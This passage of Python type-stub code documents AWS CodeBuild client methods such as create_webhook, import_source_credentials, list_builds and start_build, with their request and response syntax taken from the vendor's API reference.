* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --* **[REQUIRED]**
The name or key of the environment variable.
- **value** *(string) --* **[REQUIRED]**
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is be used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system\'s base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c \"until docker info; do echo .; sleep 1; done\"``
If the operating system\'s base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 -t sh -c \"until docker info; do echo .; sleep 1; done\"``
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --* **[REQUIRED]**
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild\'s service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project\'s service role.
When you use a cross-account or private registry image, you must use SERVICE_ROLE credentials. When you use an AWS CodeBuild curated image, you must use CODEBUILD credentials.
:type serviceRole: string
:param serviceRole: **[REQUIRED]**
The ARN of the AWS Identity and Access Management (IAM) role that enables AWS CodeBuild to interact with dependent AWS services on behalf of the AWS account.
:type timeoutInMinutes: integer
:param timeoutInMinutes:
How long, in minutes, from 5 to 480 (8 hours), for AWS CodeBuild to wait before it times out any build that has not been marked as completed. The default is 60 minutes.
:type queuedTimeoutInMinutes: integer
:param queuedTimeoutInMinutes:
The number of minutes a build is allowed to be queued before it times out.
:type encryptionKey: string
:param encryptionKey:
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK\'s alias (using the format ``alias/*alias-name* `` ).
:type tags: list
:param tags:
A set of tags for this build project.
These tags are available for use by AWS services that support AWS CodeBuild build project tags.
- *(dict) --*
A tag, consisting of a key and a value.
This tag is available for use by AWS services that support tags in AWS CodeBuild.
- **key** *(string) --*
The tag\'s key.
- **value** *(string) --*
The tag\'s value.
:type vpcConfig: dict
:param vpcConfig:
VpcConfig enables AWS CodeBuild to access resources in an Amazon VPC.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security groups IDs in your Amazon VPC.
- *(string) --*
:type badgeEnabled: boolean
:param badgeEnabled:
Set this to true to generate a publicly accessible URL for your project\'s build badge.
:type logsConfig: dict
:param logsConfig:
Information about logs for the build project. These can be logs in Amazon CloudWatch Logs, logs uploaded to a specified S3 bucket, or both.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project. Amazon CloudWatch Logs are enabled by default.
- **status** *(string) --* **[REQUIRED]**
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about logs built to an S3 bucket for a build project. S3 logs are not enabled by default.
- **status** *(string) --* **[REQUIRED]**
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
:rtype: dict
:returns:
"""
pass
def create_webhook(self, projectName: str, branchFilter: str = None, filterGroups: List = None) -> Dict:
"""
For an existing AWS CodeBuild build project that has its source code stored in a GitHub or Bitbucket repository, enables AWS CodeBuild to start rebuilding the source code every time a code change is pushed to the repository.
.. warning::
If you enable webhooks for an AWS CodeBuild project, and the project is used as a build step in AWS CodePipeline, then two identical builds are created for each commit. One build is triggered through webhooks, and one through AWS CodePipeline. Because billing is on a per-build basis, you are billed for both builds. Therefore, if you are using AWS CodePipeline, we recommend that you disable webhooks in AWS CodeBuild. In the AWS CodeBuild console, clear the Webhook box. For more information, see step 5 in `Change a Build Project's Settings <https://docs.aws.amazon.com/codebuild/latest/userguide/change-project.html#change-project-console>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/CreateWebhook>`_
**Request Syntax**
::
response = client.create_webhook(
projectName='string',
branchFilter='string',
filterGroups=[
[
{
'type': 'EVENT'|'BASE_REF'|'HEAD_REF'|'ACTOR_ACCOUNT_ID'|'FILE_PATH',
'pattern': 'string',
'excludeMatchedPattern': True|False
},
],
]
)
**Response Syntax**
::
{
'webhook': {
'url': 'string',
'payloadUrl': 'string',
'secret': 'string',
'branchFilter': 'string',
'filterGroups': [
[
{
'type': 'EVENT'|'BASE_REF'|'HEAD_REF'|'ACTOR_ACCOUNT_ID'|'FILE_PATH',
'pattern': 'string',
'excludeMatchedPattern': True|False
},
],
],
'lastModifiedSecret': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
- **webhook** *(dict) --*
Information about a webhook that connects repository events to a build project in AWS CodeBuild.
- **url** *(string) --*
The URL to the webhook.
- **payloadUrl** *(string) --*
The AWS CodeBuild endpoint where webhook events are sent.
- **secret** *(string) --*
The secret token of the associated repository.
.. note::
A Bitbucket webhook does not support ``secret`` .
- **branchFilter** *(string) --*
A regular expression used to determine which repository branches are built when a webhook is triggered. If the name of a branch matches the regular expression, then it is built. If ``branchFilter`` is empty, then all branches are built.
.. note::
It is recommended that you use ``filterGroups`` instead of ``branchFilter`` .
- **filterGroups** *(list) --*
An array of arrays of ``WebhookFilter`` objects used to determine which webhooks are triggered. At least one ``WebhookFilter`` in the array must specify ``EVENT`` as its ``type`` .
For a build to be triggered, at least one filter group in the ``filterGroups`` array must pass. For a filter group to pass, each of its filters must pass.
- *(list) --*
- *(dict) --*
A filter used to determine which webhooks trigger a build.
- **type** *(string) --*
The type of webhook filter. There are five webhook filter types: ``EVENT`` , ``ACTOR_ACCOUNT_ID`` , ``HEAD_REF`` , ``BASE_REF`` , and ``FILE_PATH`` .
EVENT
A webhook event triggers a build when the provided ``pattern`` matches one of four event types: ``PUSH`` , ``PULL_REQUEST_CREATED`` , ``PULL_REQUEST_UPDATED`` , and ``PULL_REQUEST_REOPENED`` . The ``EVENT`` patterns are specified as a comma-separated string. For example, ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` filters all push, pull request created, and pull request updated events.
.. note::
The ``PULL_REQUEST_REOPENED`` works with GitHub and GitHub Enterprise only.
ACTOR_ACCOUNT_ID
A webhook event triggers a build when a GitHub, GitHub Enterprise, or Bitbucket account ID matches the regular expression ``pattern`` .
HEAD_REF
A webhook event triggers a build when the head reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` and ``refs/tags/tag-name`` .
Works with GitHub and GitHub Enterprise push, GitHub and GitHub Enterprise pull request, Bitbucket push, and Bitbucket pull request events.
BASE_REF
A webhook event triggers a build when the base reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` .
.. note::
Works with pull request events only.
FILE_PATH
A webhook triggers a build when the path of a changed file matches the regular expression ``pattern`` .
.. note::
Works with GitHub and GitHub Enterprise push events only.
- **pattern** *(string) --*
For a ``WebHookFilter`` that uses ``EVENT`` type, a comma-separated string that specifies one or more events. For example, the webhook filter ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` allows all push, pull request created, and pull request updated events to trigger a build.
For a ``WebHookFilter`` that uses any of the other filter types, a regular expression pattern. For example, a ``WebHookFilter`` that uses ``HEAD_REF`` for its ``type`` and the pattern ``^refs/heads/`` triggers a build when the head reference is a branch with a reference name ``refs/heads/branch-name`` .
- **excludeMatchedPattern** *(boolean) --*
Used to indicate that the ``pattern`` determines which webhook events do not trigger a build. If true, then a webhook event that does not match the ``pattern`` triggers a build. If false, then a webhook event that matches the ``pattern`` triggers a build.
- **lastModifiedSecret** *(datetime) --*
A timestamp that indicates the last time a repository's secret token was modified.
:type projectName: string
:param projectName: **[REQUIRED]**
The name of the AWS CodeBuild project.
:type branchFilter: string
:param branchFilter:
A regular expression used to determine which repository branches are built when a webhook is triggered. If the name of a branch matches the regular expression, then it is built. If ``branchFilter`` is empty, then all branches are built.
.. note::
It is recommended that you use ``filterGroups`` instead of ``branchFilter`` .
:type filterGroups: list
:param filterGroups:
An array of arrays of ``WebhookFilter`` objects used to determine which webhooks are triggered. At least one ``WebhookFilter`` in the array must specify ``EVENT`` as its ``type`` .
For a build to be triggered, at least one filter group in the ``filterGroups`` array must pass. For a filter group to pass, each of its filters must pass.
- *(list) --*
- *(dict) --*
A filter used to determine which webhooks trigger a build.
- **type** *(string) --* **[REQUIRED]**
The type of webhook filter. There are five webhook filter types: ``EVENT`` , ``ACTOR_ACCOUNT_ID`` , ``HEAD_REF`` , ``BASE_REF`` , and ``FILE_PATH`` .
EVENT
A webhook event triggers a build when the provided ``pattern`` matches one of four event types: ``PUSH`` , ``PULL_REQUEST_CREATED`` , ``PULL_REQUEST_UPDATED`` , and ``PULL_REQUEST_REOPENED`` . The ``EVENT`` patterns are specified as a comma-separated string. For example, ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` filters all push, pull request created, and pull request updated events.
.. note::
The ``PULL_REQUEST_REOPENED`` works with GitHub and GitHub Enterprise only.
ACTOR_ACCOUNT_ID
A webhook event triggers a build when a GitHub, GitHub Enterprise, or Bitbucket account ID matches the regular expression ``pattern`` .
HEAD_REF
A webhook event triggers a build when the head reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` and ``refs/tags/tag-name`` .
Works with GitHub and GitHub Enterprise push, GitHub and GitHub Enterprise pull request, Bitbucket push, and Bitbucket pull request events.
BASE_REF
A webhook event triggers a build when the base reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` .
.. note::
Works with pull request events only.
FILE_PATH
A webhook triggers a build when the path of a changed file matches the regular expression ``pattern`` .
.. note::
Works with GitHub and GitHub Enterprise push events only.
- **pattern** *(string) --* **[REQUIRED]**
For a ``WebHookFilter`` that uses ``EVENT`` type, a comma-separated string that specifies one or more events. For example, the webhook filter ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` allows all push, pull request created, and pull request updated events to trigger a build.
For a ``WebHookFilter`` that uses any of the other filter types, a regular expression pattern. For example, a ``WebHookFilter`` that uses ``HEAD_REF`` for its ``type`` and the pattern ``^refs/heads/`` triggers a build when the head reference is a branch with a reference name ``refs/heads/branch-name`` .
- **excludeMatchedPattern** *(boolean) --*
Used to indicate that the ``pattern`` determines which webhook events do not trigger a build. If true, then a webhook event that does not match the ``pattern`` triggers a build. If false, then a webhook event that matches the ``pattern`` triggers a build.
:rtype: dict
:returns:
"""
pass
def delete_project(self, name: str) -> Dict:
"""
Deletes a build project.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/DeleteProject>`_
**Request Syntax**
::
response = client.delete_project(
name='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type name: string
:param name: **[REQUIRED]**
The name of the build project.
:rtype: dict
:returns:
"""
pass
def delete_source_credentials(self, arn: str) -> Dict:
"""
Deletes a set of GitHub, GitHub Enterprise, or Bitbucket source credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/DeleteSourceCredentials>`_
**Request Syntax**
::
response = client.delete_source_credentials(
arn='string'
)
**Response Syntax**
::
{
'arn': 'string'
}
**Response Structure**
- *(dict) --*
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the token.
:type arn: string
:param arn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the token.
:rtype: dict
:returns:
"""
pass
def delete_webhook(self, projectName: str) -> Dict:
"""
For an existing AWS CodeBuild build project that has its source code stored in a GitHub or Bitbucket repository, stops AWS CodeBuild from rebuilding the source code every time a code change is pushed to the repository.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/DeleteWebhook>`_
**Request Syntax**
::
response = client.delete_webhook(
projectName='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type projectName: string
:param projectName: **[REQUIRED]**
The name of the AWS CodeBuild project.
:rtype: dict
:returns:
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def import_source_credentials(self, token: str, serverType: str, authType: str, username: str = None) -> Dict:
"""
Imports the source repository credentials for an AWS CodeBuild project that has its source code stored in a GitHub, GitHub Enterprise, or Bitbucket repository.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/ImportSourceCredentials>`_
**Request Syntax**
::
response = client.import_source_credentials(
username='string',
token='string',
serverType='GITHUB'|'BITBUCKET'|'GITHUB_ENTERPRISE',
authType='OAUTH'|'BASIC_AUTH'|'PERSONAL_ACCESS_TOKEN'
)
**Response Syntax**
::
{
'arn': 'string'
}
**Response Structure**
- *(dict) --*
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the token.
:type username: string
:param username:
The Bitbucket username when the ``authType`` is BASIC_AUTH. This parameter is not valid for other types of source providers or connections.
:type token: string
:param token: **[REQUIRED]**
For GitHub or GitHub Enterprise, this is the personal access token. For Bitbucket, this is the app password.
:type serverType: string
:param serverType: **[REQUIRED]**
The source provider used for this project.
:type authType: string
:param authType: **[REQUIRED]**
The type of authentication used to connect to a GitHub, GitHub Enterprise, or Bitbucket repository. An OAUTH connection is not supported by the API and must be created using the AWS CodeBuild console.
:rtype: dict
:returns:
"""
pass
def invalidate_project_cache(self, projectName: str) -> Dict:
"""
Resets the cache for a project.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/InvalidateProjectCache>`_
**Request Syntax**
::
response = client.invalidate_project_cache(
projectName='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type projectName: string
:param projectName: **[REQUIRED]**
The name of the AWS CodeBuild build project that the cache is reset for.
:rtype: dict
:returns:
"""
pass
def list_builds(self, sortOrder: str = None, nextToken: str = None) -> Dict:
"""
Gets a list of build IDs, with each build ID representing a single build.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/ListBuilds>`_
**Request Syntax**
::
response = client.list_builds(
sortOrder='ASCENDING'|'DESCENDING',
nextToken='string'
)
**Response Syntax**
::
{
'ids': [
'string',
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **ids** *(list) --*
A list of build IDs, with each build ID representing a single build.
- *(string) --*
- **nextToken** *(string) --*
If there are more than 100 items in the list, only the first 100 items are returned, along with a unique string called a *next token* . To get the next batch of items in the list, call this operation again, adding the next token to the call.
:type sortOrder: string
:param sortOrder:
The order to list build IDs. Valid values include:
* ``ASCENDING`` : List the build IDs in ascending order by build ID.
* ``DESCENDING`` : List the build IDs in descending order by build ID.
:type nextToken: string
:param nextToken:
During a previous call, if there are more than 100 items in the list, only the first 100 items are returned, along with a unique string called a *next token* . To get the next batch of items in the list, call this operation again, adding the next token to the call. To get all of the items in the list, keep calling this operation with each subsequent next token that is returned, until no more next tokens are returned.
:rtype: dict
:returns:
"""
pass
def list_builds_for_project(self, projectName: str, sortOrder: str = None, nextToken: str = None) -> Dict:
"""
Gets a list of build IDs for the specified build project, with each build ID representing a single build.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/ListBuildsForProject>`_
**Request Syntax**
::
response = client.list_builds_for_project(
projectName='string',
sortOrder='ASCENDING'|'DESCENDING',
nextToken='string'
)
**Response Syntax**
::
{
'ids': [
'string',
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **ids** *(list) --*
A list of build IDs for the specified build project, with each build ID representing a single build.
- *(string) --*
- **nextToken** *(string) --*
If there are more than 100 items in the list, only the first 100 items are returned, along with a unique string called a *next token* . To get the next batch of items in the list, call this operation again, adding the next token to the call.
:type projectName: string
:param projectName: **[REQUIRED]**
The name of the AWS CodeBuild project.
:type sortOrder: string
:param sortOrder:
The order to list build IDs. Valid values include:
* ``ASCENDING`` : List the build IDs in ascending order by build ID.
* ``DESCENDING`` : List the build IDs in descending order by build ID.
:type nextToken: string
:param nextToken:
During a previous call, if there are more than 100 items in the list, only the first 100 items are returned, along with a unique string called a *next token* . To get the next batch of items in the list, call this operation again, adding the next token to the call. To get all of the items in the list, keep calling this operation with each subsequent next token that is returned, until no more next tokens are returned.
:rtype: dict
:returns:
"""
pass
def list_curated_environment_images(self) -> Dict:
"""
Gets information about Docker images that are managed by AWS CodeBuild.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/ListCuratedEnvironmentImages>`_
**Request Syntax**
::
response = client.list_curated_environment_images()
**Response Syntax**
::
{
'platforms': [
{
'platform': 'DEBIAN'|'AMAZON_LINUX'|'UBUNTU'|'WINDOWS_SERVER',
'languages': [
{
'language': 'JAVA'|'PYTHON'|'NODE_JS'|'RUBY'|'GOLANG'|'DOCKER'|'ANDROID'|'DOTNET'|'BASE'|'PHP',
'images': [
{
'name': 'string',
'description': 'string',
'versions': [
'string',
]
},
]
},
]
},
]
}
**Response Structure**
- *(dict) --*
- **platforms** *(list) --*
Information about supported platforms for Docker images that are managed by AWS CodeBuild.
- *(dict) --*
A set of Docker images that are related by platform and are managed by AWS CodeBuild.
- **platform** *(string) --*
The platform's name.
- **languages** *(list) --*
The list of programming languages that are available for the specified platform.
- *(dict) --*
A set of Docker images that are related by programming language and are managed by AWS CodeBuild.
- **language** *(string) --*
The programming language for the Docker images.
- **images** *(list) --*
The list of Docker images that are related by the specified programming language.
- *(dict) --*
Information about a Docker image that is managed by AWS CodeBuild.
- **name** *(string) --*
The name of the Docker image.
- **description** *(string) --*
The description of the Docker image.
- **versions** *(list) --*
A list of environment image versions.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def list_projects(self, sortBy: str = None, sortOrder: str = None, nextToken: str = None) -> Dict:
"""
Gets a list of build project names, with each build project name representing a single build project.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/ListProjects>`_
**Request Syntax**
::
response = client.list_projects(
sortBy='NAME'|'CREATED_TIME'|'LAST_MODIFIED_TIME',
sortOrder='ASCENDING'|'DESCENDING',
nextToken='string'
)
**Response Syntax**
::
{
'nextToken': 'string',
'projects': [
'string',
]
}
**Response Structure**
- *(dict) --*
- **nextToken** *(string) --*
If there are more than 100 items in the list, only the first 100 items are returned, along with a unique string called a *next token* . To get the next batch of items in the list, call this operation again, adding the next token to the call.
- **projects** *(list) --*
The list of build project names, with each build project name representing a single build project.
- *(string) --*
:type sortBy: string
:param sortBy:
The criterion to be used to list build project names. Valid values include:
* ``CREATED_TIME`` : List based on when each build project was created.
* ``LAST_MODIFIED_TIME`` : List based on when information about each build project was last changed.
* ``NAME`` : List based on each build project\'s name.
Use ``sortOrder`` to specify in what order to list the build project names based on the preceding criteria.
:type sortOrder: string
:param sortOrder:
The order in which to list build projects. Valid values include:
* ``ASCENDING`` : List in ascending order.
* ``DESCENDING`` : List in descending order.
Use ``sortBy`` to specify the criterion to be used to list build project names.
:type nextToken: string
:param nextToken:
During a previous call, if there are more than 100 items in the list, only the first 100 items are returned, along with a unique string called a *next token* . To get the next batch of items in the list, call this operation again, adding the next token to the call. To get all of the items in the list, keep calling this operation with each subsequent next token that is returned, until no more next tokens are returned.
:rtype: dict
:returns:
"""
pass
def list_source_credentials(self) -> Dict:
"""
Returns a list of ``SourceCredentialsInfo`` objects.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/ListSourceCredentials>`_
**Request Syntax**
::
response = client.list_source_credentials()
**Response Syntax**
::
{
'sourceCredentialsInfos': [
{
'arn': 'string',
'serverType': 'GITHUB'|'BITBUCKET'|'GITHUB_ENTERPRISE',
'authType': 'OAUTH'|'BASIC_AUTH'|'PERSONAL_ACCESS_TOKEN'
},
]
}
**Response Structure**
- *(dict) --*
- **sourceCredentialsInfos** *(list) --*
A list of ``SourceCredentialsInfo`` objects. Each ``SourceCredentialsInfo`` object includes the authentication type, token ARN, and type of source provider for one set of credentials.
- *(dict) --*
Information about the credentials for a GitHub, GitHub Enterprise, or Bitbucket repository.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the token.
- **serverType** *(string) --*
The type of source provider. The valid options are GITHUB, GITHUB_ENTERPRISE, or BITBUCKET.
- **authType** *(string) --*
The type of authentication used by the credentials. Valid options are OAUTH, BASIC_AUTH, or PERSONAL_ACCESS_TOKEN.
:rtype: dict
:returns:
"""
pass
def start_build(self, projectName: str, secondarySourcesOverride: List = None, secondarySourcesVersionOverride: List = None, sourceVersion: str = None, artifactsOverride: Dict = None, secondaryArtifactsOverride: List = None, environmentVariablesOverride: List = None, sourceTypeOverride: str = None, sourceLocationOverride: str = None, sourceAuthOverride: Dict = None, gitCloneDepthOverride: int = None, gitSubmodulesConfigOverride: Dict = None, buildspecOverride: str = None, insecureSslOverride: bool = None, reportBuildStatusOverride: bool = None, environmentTypeOverride: str = None, imageOverride: str = None, computeTypeOverride: str = None, certificateOverride: str = None, cacheOverride: Dict = None, serviceRoleOverride: str = None, privilegedModeOverride: bool = None, timeoutInMinutesOverride: int = None, queuedTimeoutInMinutesOverride: int = None, idempotencyToken: str = None, logsConfigOverride: Dict = None, registryCredentialOverride: Dict = None, imagePullCredentialsTypeOverride: str = None) -> Dict:
"""
Starts running a build.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/StartBuild>`_
**Request Syntax**
::
response = client.start_build(
projectName='string',
secondarySourcesOverride=[
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
secondarySourcesVersionOverride=[
{
'sourceIdentifier': 'string',
'sourceVersion': 'string'
},
],
sourceVersion='string',
artifactsOverride={
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
secondaryArtifactsOverride=[
{
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
environmentVariablesOverride=[
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
sourceTypeOverride='CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
sourceLocationOverride='string',
sourceAuthOverride={
'type': 'OAUTH',
'resource': 'string'
},
gitCloneDepthOverride=123,
gitSubmodulesConfigOverride={
'fetchSubmodules': True|False
},
buildspecOverride='string',
insecureSslOverride=True|False,
reportBuildStatusOverride=True|False,
environmentTypeOverride='WINDOWS_CONTAINER'|'LINUX_CONTAINER',
imageOverride='string',
computeTypeOverride='BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
certificateOverride='string',
cacheOverride={
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
serviceRoleOverride='string',
privilegedModeOverride=True|False,
timeoutInMinutesOverride=123,
queuedTimeoutInMinutesOverride=123,
idempotencyToken='string',
logsConfigOverride={
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
},
registryCredentialOverride={
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
imagePullCredentialsTypeOverride='CODEBUILD'|'SERVICE_ROLE'
)
**Response Syntax**
::
{
'build': {
'id': 'string',
'arn': 'string',
'startTime': datetime(2015, 1, 1),
'endTime': datetime(2015, 1, 1),
'currentPhase': 'string',
'buildStatus': 'SUCCEEDED'|'FAILED'|'FAULT'|'TIMED_OUT'|'IN_PROGRESS'|'STOPPED',
'sourceVersion': 'string',
'resolvedSourceVersion': 'string',
'projectName': 'string',
'phases': [
{
'phaseType': 'SUBMITTED'|'QUEUED'|'PROVISIONING'|'DOWNLOAD_SOURCE'|'INSTALL'|'PRE_BUILD'|'BUILD'|'POST_BUILD'|'UPLOAD_ARTIFACTS'|'FINALIZING'|'COMPLETED',
'phaseStatus': 'SUCCEEDED'|'FAILED'|'FAULT'|'TIMED_OUT'|'IN_PROGRESS'|'STOPPED',
'startTime': datetime(2015, 1, 1),
'endTime': datetime(2015, 1, 1),
'durationInSeconds': 123,
'contexts': [
{
'statusCode': 'string',
'message': 'string'
},
]
},
],
'source': {
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
'secondarySources': [
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
